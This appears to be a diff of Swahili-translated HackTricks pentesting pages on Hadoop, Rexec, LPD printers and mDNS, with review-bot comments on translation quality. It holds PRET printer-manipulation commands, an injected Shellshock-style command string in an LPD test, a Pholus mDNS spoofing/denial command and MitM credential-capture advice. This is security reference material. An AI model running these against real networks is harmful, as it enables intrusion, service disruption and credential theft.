- **`hadoop-tasktracker-info (Port 50060)`**
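Review bot: this file has no title heading, unlike the sibling pages (`# 5000 - Pentesting Docker Registry`, `# 512 - Pentesting Rexec`), and its first section is written as a bold H1 (`# **Taarifa za Msingi**`) where the other pages use a plain H2 (`## Basic Information`). Add a `# <port> - Pentesting Hadoop` title and demote the section to `##` without the bold wrapper so the page renders consistently in the book.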
@ -26,18 +27,19 @@ Kwa bahati mbaya, Hadoop haina msaada katika mfumo wa Metasploit wakati wa kudok
- **`hadoop-secondary-namenode-info (Port 50090)`**
Ni muhimu kutambua kwamba **Hadoop inafanya kazi bila uwakilishi katika usanidi wake wa msingi**. Walakini, kwa usalama ulioimarishwa, mipangilio inapatikana kuunganisha Kerberos na huduma za HDFS, YARN, na MapReduce.
Ni muhimu kutambua kwamba **Hadoop inafanya kazi bila uthibitisho katika mipangilio yake ya msingi**. Hata hivyo, kwa usalama zaidi, mipangilio inapatikana kuunganisha Kerberos na HDFS, YARN, na huduma za MapReduce.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
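Review bot: the NSE script names are listed (`hadoop-jobtracker-info (Port 50030)`, `hadoop-tasktracker-info (Port 50060)`, `hadoop-secondary-namenode-info (Port 50090)`) but the page never shows how to run them; a one-line invocation such as `nmap -p 50030,50060,50090 --script hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-secondary-namenode-info <host>` would make the section actionable. The retranslation also fixes a real error here: "bila uwakilishi" ("without representation") is now "bila uthibitisho" ("without authentication"), which is what the sentence about Hadoop's default configuration means.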

View file

@ -1,40 +1,42 @@
# 512 - Pentesting Rexec
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Ni huduma ambayo **inakuwezesha kutekeleza amri ndani ya mwenyeji** ikiwa unajua **vitambulisho sahihi** (jina la mtumiaji na nywila).
Ni huduma ambayo **inakuwezesha kutekeleza amri ndani ya mwenyeji** ikiwa unajua **akikazi** halali (jina la mtumiaji na nenosiri).
**Bandari ya Default:** 512
**Default Port:** 512
```
PORT STATE SERVICE
512/tcp open exec
```
### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
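Review bot: the new sentence "ikiwa unajua **akikazi** halali (jina la mtumiaji na nenosiri)" uses `akikazi`, which is not a word; the earlier `vitambulisho` or the `akidi` used in the Docker Registry page is the right term for credentials. As in the other files, `## Basic Information` and `**Default Port:** 512` stay in English inside an otherwise Swahili page; pick one language for headings and labels.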

View file

@ -1,24 +1,25 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### **Utangulizi kwa Itifaki ya LPD**
### **Utangulizi wa Protokali ya LPD**
Katika miaka ya 1980, **Itifaki ya Line Printer Daemon (LPD)** ilianzishwa katika Berkeley Unix, ambayo baadaye ilifanywa rasmi kupitia RFC1179. Itifaki hii inafanya kazi kupitia bandari 515/tcp, kuruhusu mwingiliano kupitia amri ya `lpr`. Kiini cha uchapishaji kupitia LPD ni kutuma **faili ya kudhibiti** (kutaja maelezo ya kazi na mtumiaji) pamoja na **faili ya data** (ambayo inashikilia habari za uchapishaji). Wakati faili ya kudhibiti inaruhusu uchaguzi wa **muundo tofauti wa faili** kwa faili ya data, kushughulikia faili hizi kunategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama ya Unix ni **LPRng**. Kwa umuhimu, itifaki ya LPD inaweza kutumiwa kudukua na kutekeleza kazi za uchapishaji za **PostScript** au **PJL zenye nia mbaya**.
Katika miaka ya 1980, **Line Printer Daemon (LPD) protocol** ilitengenezwa katika Berkeley Unix, ambayo baadaye ilithibitishwa kupitia RFC1179. Protokali hii inafanya kazi kupitia bandari 515/tcp, ikiruhusu mwingiliano kupitia amri ya `lpr`. Kiini cha uchapishaji kupitia LPD kinahusisha kutuma **faili ya udhibiti** (ili kubainisha maelezo ya kazi na mtumiaji) pamoja na **faili ya data** (ambayo ina habari za uchapishaji). Wakati faili ya udhibiti inaruhusu uchaguzi wa **aina mbalimbali za faili** kwa faili ya data, usimamizi wa faili hizi unategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama Unix ni **LPRng**. Kwa kuzingatia, protokali ya LPD inaweza kutumika vibaya kutekeleza **PostScript mbaya** au **kazi za uchapishaji za PJL**.
### **Vyombo vya Mwingiliano na Printa za LPD**
### **Zana za Kuingiliana na Printer za LPD**
[**PRET**](https://github.com/RUB-NDS/PRET) inaleta zana mbili muhimu, `lpdprint` na `lpdtest`, zinazotoa njia rahisi ya kuingiliana na printa zinazofaa LPD. Zana hizi zinaruhusu vitendo mbalimbali kuanzia uchapishaji wa data hadi kubadilisha faili kwenye printa, kama kupakua, kupakia, au kufuta:
[**PRET**](https://github.com/RUB-NDS/PRET) inatoa zana mbili muhimu, `lpdprint` na `lpdtest`, zinazotoa njia rahisi ya kuingiliana na printer zinazofaa LPD. Zana hizi zinaruhusu aina mbalimbali za vitendo kutoka kwa uchapishaji wa data hadi kubadilisha faili kwenye printer, kama vile kupakua, kupakia, au kufuta:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
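Review bot: the PRET block is fenced as ```python but its contents are shell invocations (`lpdprint.py hostname filename`, `lpdtest.py hostname ...`), so the fence should be ```bash; the python tag only mis-highlights the commands. Two wording points in the prose: "ilithibitishwa kupitia RFC1179" says the protocol was "confirmed" by the RFC, whereas the earlier "ilifanywa rasmi" ("formalized") was accurate; and "uchomaji" ("burning") in the old text is correctly replaced by "hacking" in the new line, so keep that change.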
@ -33,23 +34,24 @@ lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
Kwa watu binafsi wanaopenda kuchunguza zaidi ulimwengu wa **uchomaji wa printa**, rasilimali kamili inaweza kupatikana hapa: [**Kuchoma Printa**](http://hacking-printers.net/wiki/index.php/Main_Page).
Kwa watu wanaovutiwa na kuchunguza zaidi ulimwengu wa **printer hacking**, rasilimali kamili inaweza kupatikana hapa: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
# Shodan
* `bandari 515`
* `port 515`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za uchomaji kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
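Review bot: The replacement footer is half-translated: `<summary>Support HackTricks</summary>` and the two `{% hint %}` course lines stay in English while the bullets that follow (`Angalia [**mpango wa usajili**]...`, `**Jiunge na** ...`, `**Shiriki mbinu za hacking ...`) are Swahili; pick one language for the whole `<details>` block. The Shodan entry change from `bandari 515` to `port 515` is right, since a search term typed into Shodan must not be translated; if the entry is meant as a filter, Shodan's filter syntax is `port:515` with a colon.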

View file

@ -1,85 +1,87 @@
# 5353/UDP Multicast DNS (mDNS) na DNS-SD
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Taarifa Msingi**
## **Taarifa za Msingi**
**Multicast DNS (mDNS)** inawezesha **shughuli kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya DNS ya kawaida. Inafanya kazi kwenye **bandari ya UDP 5353** na inaruhusu vifaa kugundua wenyewe na huduma zao, mara nyingi zinazopatikana kwenye vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, mara nyingi hutumiwa pamoja na mDNS, inasaidia kutambua huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
**Multicast DNS (mDNS)** inaruhusu **operesheni kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya jadi ya DNS. Inafanya kazi kwenye **UDP port 5353** na inaruhusu vifaa kugundua kila mmoja na huduma zao, ambayo mara nyingi inaonekana katika vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, ambayo mara nyingi hutumika pamoja na mDNS, inasaidia katika kutambua huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Uendeshaji wa mDNS**
Katika mazingira ambayo hayana seva ya DNS ya kawaida, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayoishia na **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Mambo muhimu ya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayoonyesha uhalali wa rekodi na **biti ya QU** inayotofautisha kati ya maswali ya unicast na multicast. Kuhusu usalama, ni muhimu kwa utekelezaji wa mDNS kuhakikisha kuwa anwani ya chanzo cha pakiti inalingana na subnet ya ndani.
Katika mazingira yasiyo na seva ya kawaida ya DNS, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayomalizika kwa **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Vipengele muhimu vya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayonyesha uhalali wa rekodi na **QU bit** inayotofautisha kati ya maswali ya unicast na multicast. Kwa upande wa usalama, ni muhimu kwa utekelezaji wa mDNS kuthibitisha kwamba anwani ya chanzo ya pakiti inalingana na subnet ya ndani.
### **Uendeshaji wa DNS-SD**
DNS-SD inawezesha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) ambazo zinafanya ramani ya aina za huduma kwa mifano yao. Huduma zinatambuliwa kwa kutumia muundo wa **_\<Huduma>.\_tcp au \_\<Huduma>.\_udp** ndani ya kikoa cha **.local**, ambayo inasababisha ugunduzi wa rekodi za **SRV** na **TXT** zinazotoa habari za kina kuhusu huduma.
DNS-SD inarahisisha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) zinazounganisha aina za huduma na mifano yao. Huduma zinatambulishwa kwa kutumia muundo wa **_\<Service>.\_tcp au \_\<Service>.\_udp** ndani ya kikoa cha **.local**, na kusababisha ugunduzi wa rekodi zinazolingana za **SRV** na **TXT** ambazo zinatoa maelezo ya kina kuhusu huduma.
### **Uchunguzi wa Mtandao**
#### **Matumizi ya nmap**
Amri muhimu kwa skanning ya mtandao wa ndani kwa huduma za mDNS ni:
Amri inayofaa kwa ajili ya skanning mtandao wa ndani kwa huduma za mDNS ni:
```bash
nmap -Pn -sUC -p5353 [target IP address]
```
Amri hii inasaidia kutambua bandari za mDNS zilizofunguliwa na huduma zinazotangazwa kupitia hizo.
Hii amri inasaidia kubaini bandari za mDNS zilizo wazi na huduma zinazotangazwa kupitia hizo.
#### **Uchunguzi wa Mtandao kwa Kutumia Pholus**
#### **Uainishaji wa Mtandao kwa kutumia Pholus**
Kwa kutuma ombi za mDNS kwa njia ya moja kwa moja na kukamata trafiki, zana ya **Pholus** inaweza kutumika kama ifuatavyo:
Ili kutuma maombi ya mDNS kwa njia ya kazi na kukamata trafiki, chombo cha **Pholus** kinaweza kutumika kama ifuatavyo:
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
```
## Mashambulizi
## Attacks
### **Kuathiri Uchunguzi wa mDNS**
### **Exploiting mDNS Probing**
Mbinu ya shambulizi inahusisha kutuma majibu ya uongo kwa uchunguzi wa mDNS, ikipendekeza kuwa majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la pekee. Hii inaweza kutekelezwa kwa kutumia:
Njia ya shambulio inahusisha kutuma majibu ya uongo kwa mDNS probes, ikionyesha kwamba majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la kipekee. Hii inaweza kufanywa kwa kutumia:
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
```
Teknikia hii inazuia vifaa vipya kusajili huduma zao kwenye mtandao.
H technique hii inazuia vifaa vipya kujiandikisha huduma zao kwenye mtandao.
**Kwa ufupi**, kuelewa jinsi mDNS na DNS-SD inavyofanya kazi ni muhimu kwa usimamizi na usalama wa mtandao. Zana kama **nmap** na **Pholus** hutoa ufahamu muhimu juu ya huduma za mtandao wa ndani, wakati ufahamu wa udhaifu unaosababishwa husaidia kulinda dhidi ya mashambulizi.
**Kwa muhtasari**, kuelewa jinsi mDNS na DNS-SD zinavyofanya kazi ni muhimu kwa usimamizi wa mtandao na usalama. Zana kama **nmap** na **Pholus** hutoa maarifa muhimu kuhusu huduma za mtandao wa ndani, wakati ufahamu wa hatari zinazoweza kutokea husaidia katika kulinda dhidi ya mashambulizi.
### Kudanganya/MitM
### Spoofing/MitM
Shambulio la kuvutia zaidi unaloweza kufanya kwenye huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Huenda ukaweza kupata faili nyeti (MitM mawasiliano na printer) au hata vibali (uthibitishaji wa Windows).\
Shambulio la kuvutia zaidi ambalo unaweza kufanya kupitia huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitishaji wa Windows).\
Kwa maelezo zaidi angalia:
{% content-ref url="../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
## Marejeo
## Marejeleo
* [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
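Review bot: The replacement sentence `H technique hii inazuia vifaa vipya kujiandikisha huduma zao kwenye mtandao.` carries a stray leading `H` and leaves `technique` untranslated; `Mbinu hii inazuia vifaa vipya kusajili huduma zao kwenye mtandao.` would read correctly. The new headings `## Attacks`, `### Exploiting mDNS Probing` and `### Spoofing/MitM` revert to English although the other headings in the same file (`## Taarifa za Msingi`, `### Uendeshaji wa mDNS`, `### Uchunguzi wa Mtandao`) are Swahili; keep the Swahili headings from the old lines. The one security-relevant claim in the hunk, that an mDNS implementation should verify the packet's source address matches the local subnet, survives the retranslation intact.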

View file

@ -1,69 +1,71 @@
# 5555 - Android Debug Bridge
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
